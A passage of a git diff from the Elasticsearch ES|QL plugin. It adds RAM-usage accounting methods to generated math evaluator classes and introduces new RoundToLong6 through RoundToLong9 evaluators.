9f2eebd25cae2..d2262055cb464 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLong3Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong3Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java index f479de31dd6aa..2c1191e59fc95 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLong4Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong4Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -60,6 +63,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong6Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong6Evaluator.java new file mode 100644 index 0000000000000..2d21733fb086e --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong6Evaluator.java @@ -0,0 +1,169 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToLong6Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong6Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong6Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + } + + @Override + public RoundToLong6Evaluator get(DriverContext context) { + return new RoundToLong6Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, context); + } + + @Override + public String toString() { + return "RoundToLong6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong7Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong7Evaluator.java new file mode 100644 index 0000000000000..7bc385af72a9c --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong7Evaluator.java @@ -0,0 +1,175 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToLong7Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong7Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong7Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + } + + @Override + public RoundToLong7Evaluator get(DriverContext context) { + return new RoundToLong7Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, context); + } + + @Override + public String toString() { + return "RoundToLong7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong8Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong8Evaluator.java new file mode 100644 index 0000000000000..a5b66f3fd9c0e --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong8Evaluator.java @@ -0,0 +1,181 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToLong8Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong8Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong8Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, long p7, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6, long p7) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + } + + @Override + public RoundToLong8Evaluator get(DriverContext context) { + return new RoundToLong8Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, context); + } + + @Override + public String toString() { + return "RoundToLong8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong9Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong9Evaluator.java new file mode 100644 index 0000000000000..1e13bbf62926a --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong9Evaluator.java @@ -0,0 +1,188 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToLong9Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong9Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong9Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, long p7, long p8, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6, long p7, long p8) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + } + + @Override + public RoundToLong9Evaluator get(DriverContext context) { + return new RoundToLong9Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, context); + } + + @Override + public String toString() { + return "RoundToLong9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java index affd383be6f4e..f49c1fdbfa38e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLongBinarySearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLongBinarySearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java index 62a6c81d148e3..343cba68ec722 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLongLinearSearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLongLinearSearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java index 70cc9986f2d9d..5ca8fbc060567 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valBlock, LongBlock decimalsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java index 1b68a10a8a976..668e96c6b7074 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ScalbConstantIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbConstantIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git 